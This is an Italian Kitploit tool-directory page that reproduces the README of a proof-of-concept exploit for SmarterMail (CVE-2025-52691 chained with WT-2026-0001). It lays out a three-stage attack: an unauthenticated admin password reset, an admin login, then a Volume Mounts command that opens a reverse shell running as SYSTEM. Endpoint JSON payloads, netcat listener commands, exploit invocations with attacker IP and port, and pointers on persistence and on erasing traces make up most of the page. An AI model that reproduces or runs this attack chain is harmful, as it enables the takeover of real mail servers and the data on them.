Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2025-52691-PoC-SmarterMail-authentication-bypass-exploit-WT-2026-0001 — CVE-2025-52691 PoC: Basato sull'articolo WT-2026-0001 di watchtowr riguardante un exploit di bypass dell'autenticazione, questo è uno script di attacco funzionale in Python. | Kitploit
Strumenti/GitHubGitHub/ninjazan420/cve-2025-52691-poc-smartermail-authentication-bypass-exploit-wt-2026-0001
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingAutenticazioneRed TeamingStrumento di Accesso Remoto
GitHubninjazan420/cve-2025-52691-poc-smartermail-authentication-bypass-exploit-wt-2026-0001

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2025-52691-PoC-SmarterMail-authentication-bypass-exploit-WT-2026-0001

CVE-2025-52691 PoC: Basato sull'articolo WT-2026-0001 di watchtowr riguardante un exploit di bypass dell'autenticazione, questo è uno script di attacco funzionale in Python.

Vedi Repository
6 mesi faNon ancora revisionato

CVE-2025-52691 / WT-2026-0001 SmarterMail Exploit

🚨 AVVISO IMPORTANTE

Questo strumento è destinato esclusivamente a test di sicurezza autorizzati e scopi educativi!

  • L'uso non autorizzato è illegale e non etico
  • Utilizzare solo su sistemi con esplicita autorizzazione
  • Utilizzo a proprio rischio
  • Gli utenti sono responsabili del rispetto di tutte le leggi applicabili

📋 Panoramica

Questo exploit combina due vulnerabilità critiche in SmarterMail:

  1. CVE-2025-52691: Esecuzione di codice remoto pre-autenticazione tramite caricamento di file
    • Punteggio CVSS: 10.0 (Critico)
    • Versioni affette: Build 9406 e precedenti, Build 16.3.6989.16341 e precedenti
    • Versioni corrette: Build 9413 e successive

https://github.com/watchtowrlabs/watchTowr-vs-SmarterMail-CVE-2025-52691

  1. WT-2026-0001: Bypass di autenticazione tramite ripristino password
    • CVE-ID non assegnato
    • Versioni affette: Fino alla Build 9510
    • Versioni corrette: Build 9511 (15 gennaio 2026)

https://labs.watchtowr.com/attackers-with-decompilers-strike-again-smartertools-smartermail-wt-2026-0001-auth-bypass/

Vettore d'attacco

L'exploit esegue un attacco in 3 fasi:

  1. Fase 1: Bypass di autenticazione tramite WT-2026-0001

    • Cambia la password dell'amministratore senza verifica della vecchia password
  2. Fase 2: Login amministratore con la nuova password

    • Autenticazione all'interfaccia web di SmarterMail
  3. Fase 3: RCE tramite la funzionalità Volume Mounts

    • Crea un Volume Mount con comando di reverse shell
    • Esegue comandi del sistema operativo con privilegi SYSTEM

Prerequisiti

Requisiti di sistema

  • Python 3.6+
  • Netcat (nc)
  • curl
  • Linux/macOS/Windows (WSL)

Istruzioni di installazione

root@kitploit:~
# Installare Python 3 (se non disponibile)
# Ubuntu/Debian
sudo apt update && sudo apt install python3 python3-pip

# macOS
brew install python3

# Windows (WSL)
wsl --install

# Installare netcat
# Ubuntu/Debian
sudo apt install netcat

# macOS
brew install netcat

# Windows (WSL)
sudo apt install netcat-traditional

Installare le dipendenze

root@kitploit:~
# Dipendenze Python (se necessario)
pip3 install requests

Avvio rapido

Metodo 1: Configurazione automatica (Consigliato)

root@kitploit:~
# Rendi eseguibile
chmod +x run_exploit.sh

# Configurazione automatica
./run_exploit.sh --auto

# Oppure configurazione interattiva
./run_exploit.sh

Metodo 2: Esecuzione diretta

root@kitploit:~
# Imposta il listener (in un terminale)
nc -lvnp 4444

# Esegui l'exploit (in un secondo terminale)
python3 exploit.py -H http://192.168.1.100 -P 9998 -A 192.168.1.50 -p 4444

Metodo 3: Con tutte le opzioni

root@kitploit:~
python3 exploit.py \
  -H http://192.168.1.100 \
  -P 9998 \
  -A 192.168.1.50 \
  -p 4444 \
  -d \
  --admin-username admin \
  --new-password "MySecurePassword123!"

Istruzioni dettagliate

Passo 1: Preparazione

  1. Identificazione del target

    root@kitploit:~
    # Controlla l'host di destinazione
    curl -I http://192.168.1.100:9998
    
    # Identifica la versione di SmarterMail
    # (Di solito nella pagina di login o negli header HTTP)
    
  2. Impostazione del listener

    root@kitploit:~
    # Nel Terminale 1: Avvia il listener
    nc -lvnp 4444
    
    # Il listener deve essere in esecuzione prima di eseguire l'exploit
    
  3. Validazione della rete

    root@kitploit:~
    # Assicurati che la connessione tra attaccante e target sia possibile
    ping 192.168.1.100
    nc -zv 192.168.1.100 9998
    

Passo 2: Esecuzione dell'exploit

root@kitploit:~
# Con lo script runner (consigliato)
./run_exploit.sh

# Oppure direttamente con Python
python3 exploit.py -H http://192.168.1.100 -P 9998 -A 192.168.1.50 -p 4444

Passo 3: Dopo l'exploit

  1. Connessione alla shell

    root@kitploit:~
    # Nel terminale del listener, dovrebbe apparire una connessione
    # Dovresti avere una shell SYSTEM
    
  2. Verifica l'accesso

    root@kitploit:~
    # Nella shell ottenuta
    whoami
    hostname
    ipconfig /all  # Windows
    ifconfig       # Linux
    
  3. Accesso persistente

    root@kitploit:~
    # Opzionale: Imposta la persistenza
    # Windows: Installa come servizio
    # Linux: Cron job o servizio systemd
    

🔧 Opzioni di configurazione

Parametri di Exploit.py

Parametri di Run_Exploit.sh


Esempi

Esempio 1: Utilizzo base

root@kitploit:~
# Terminale 1: Avvia il listener
nc -lvnp 4444

# Terminale 2: Esegui l'exploit
python3 exploit.py -H http://192.168.1.100 -P 9998 -A 192.168.1.50 -p 4444

Esempio 2: Con credenziali personalizzate

root@kitploit:~
python3 exploit.py \
  -H https://mail.company.com \
  -P 443 \
  -A 10.0.0.1 \
  -p 8080 \
  --admin-username administrator \
  --new-password "ComplexPassword123!@#"

Esempio 3: Modalità debug

root@kitploit:~
python3 exploit.py -H http://192.168.1.100 -P 9998 -A 192.168.1.50 -p 4444 -d

Esempio 4: Configurazione automatica

root@kitploit:~
./run_exploit.sh --auto

Dettagli tecnici

Fase 1: Bypass di autenticazione

Endpoint: POST /api/v1/auth/force-reset-password

Payload:

root@kitploit:~
{
  "IsSysAdmin": "true",
  "OldPassword": "dummy",
  "Username": "admin",
  "NewPassword": "NewPassword123!@#",
  "ConfirmPassword": "NewPassword123!@#"
}

Risposta di successo:

root@kitploit:~
{
  "success": true,
  "resultCode": 200,
  "debugInfo": "check1\r\ncheck2\r\ncheck3\r\ncheck4.2\r\ncheck5.2\r\ncheck6.2\r\ncheck7.2\r\ncheck8.2\r\n"
}

Fase 2: Login amministratore

Endpoint: POST /api/v1/auth/login

Payload:

root@kitploit:~
{
  "username": "admin",
  "password": "NewPassword123!@#"
}

Fase 3: RCE tramite Volume Mounts

Endpoint: POST /api/v1/settings/volume-mounts

Payload:

root@kitploit:~
{
  "name": "random_volume_name",
  "path": "C:\\Temp\\random_volume_name",
  "command": "powershell reverse shell command",
  "enabled": true,
  "type": "command"
}

Risoluzione dei problemi

Problemi comuni

1. Porta bloccata

root@kitploit:~
# Errore: "Connection refused"
# Soluzione: Controlla il firewall e apri la porta
sudo ufw allow 9998

2. Listener non raggiungibile

root@kitploit:~
# Errore: "Connection failed"
# Soluzione: Controlla la configurazione del listener
nc -lvnp 4444

3. Autenticazione fallita

root@kitploit:~
# Errore: "Login failed"
# Soluzione: Controlla la versione del target (deve essere vulnerabile)

5. RCE fallita

root@kitploit:~
# Errore: "Volume mount creation failed"
# Soluzione: Controlla i privilegi amministrativi, sistema target

Modalità debug

Abilita la modalità debug per output dettagliato:

root@kitploit:~
python3 exploit.py -H http://192.168.1.100 -P 9998 -A 192.168.1.50 -p 4444 -d

⚠️ Note sulla sicurezza

Aspetti legali

  • Eseguire solo test autorizzati
  • Ottenere autorizzazione scritta
  • Garantire la conformità alle leggi locali
  • Nessun test su sistemi di produzione

Precauzioni di sicurezza

  1. Ambiente di test: Testare sempre in ambienti controllati
  2. Validazione del target: Assicurarsi che il target sia un sistema di test
  3. Isolamento di rete: Separare i sistemi di test dalla rete di produzione
  4. Documentazione: Documentare tutti i test
  5. Pulizia: Rimuovere tutte le tracce dopo il test

Uso responsabile

  • Non causare danni
  • Non rubare o manipolare dati
  • Non disabilitare sistemi
  • Essere trasparenti con le parti responsabili

Aggiornamenti e manutenzione

Note sulle versioni

  • v1.0: Versione iniziale con funzionalità complete
  • Aggiornamenti futuri: Miglioramenti alla gestione degli errori e alla stabilità

🙏 Ringraziamenti

  • watchTowr Labs per la ricerca originale
  • Community di ricerca sulla sicurezza per il supporto
  • Tutti coloro che hanno contribuito ai miglioramenti

⚠️ Ricorda: Da grandi poteri derivano grandi responsabilità!

Scarica lo strumento
ParametroDescrizioneValore predefinito
-H, --hostHost target (obbligatorio)-
-P, --portPorta target9998
-A, --attacker-ipIP dell'attaccante per reverse shell (obbligatorio)-
-p, --attacker-portPorta dell'attaccante per reverse shell (obbligatorio)-
-d, --debugAbilita la modalità debugFalse
--admin-usernameNome utente amministratoreadmin
--new-passwordNuova password amministratoreNewPassword123!@#
ParametroDescrizione
-t, --targetHost target
-p, --portPorta target
-a, --attacker-ipIP dell'attaccante
-l, --listener-portPorta del listener
-n, --new-passwordNuova password amministratore
-u, --admin-userNome utente amministratore
-d, --debugModalità debug
--autoModalità automatica